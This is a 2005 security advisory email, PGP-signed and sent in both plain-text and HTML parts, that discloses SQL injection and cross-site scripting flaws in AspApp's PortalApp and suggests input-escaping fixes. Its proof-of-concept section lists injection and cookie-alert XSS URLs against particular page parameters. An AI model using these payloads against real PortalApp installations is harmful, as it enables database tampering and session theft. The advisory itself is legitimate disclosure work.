This is a multi-part message in MIME format. ------=_NextPart_000_0046_01C53454.58BFA8E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: Multiple sql injection, and xss vulnerabilities in PortalApp. Date: March 30, 2005 Vendor: AspApp Vendor site: http://www.aspapp.com Summary: There are multiple sql injection, xss vulnerabilities in the PortalApp. Proof of Concept Exploits: http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'banner_id =3D = 'SQL_INJECTION'. /ad_click.asp, line 14 http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume= nt.cookie)%3C/script%3E Pops cookie http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3Cscript%3Eale= rt(document.cookie)%3C/script%3E Pops cookie Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM n0K6nk2uxIlFknfglJIoUkqq =3DV5fo -----END PGP SIGNATURE----- ------=_NextPart_000_0046_01C53454.58BFA8E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= /DIV>
 
Severity:  Medium
Title: Multiple sql injection, and xss=20 vulnerabilities in PortalApp.
Date: March  30,  = 2005
Vendor:=20 AspApp
Vendor site: http://www.aspapp.com
 
Summary:
There are multiple sql injection, xss vulnerabilities = in the=20 PortalApp.
 
Proof of Concept Exploits:
 
http://= localhost/ad_click.asp?banner_id=3D'SQL_INJECTION
Microsoft=20 JET Database Engine error '80040e14'
 
Syntax error in string in query expression 'banner_id =3D=20 'SQL_INJECTION'.
 
/ad_click.asp, line 14
 

http://localhost/content.asp?contenttype= =3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie
 

http://localhost/content.as= p?do_search=3D1&keywords=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/= script%3E
Pops=20 cookie
 

Possible fix: The usage of htmlspeacialchars(), = mysql_escape_string(),=20 mysql_real_escape_string() and other functions for input validation = before=20 passing user input to the mysql database, or before echoing data on the = screen,=20 would solve these problems.
 
Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com
 
iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM
= n0K6nk2uxIlFknfglJIoUkqq
=3DV5fo
-----END=20 PGP SIGNATURE-----
------=_NextPart_000_0046_01C53454.58BFA8E0--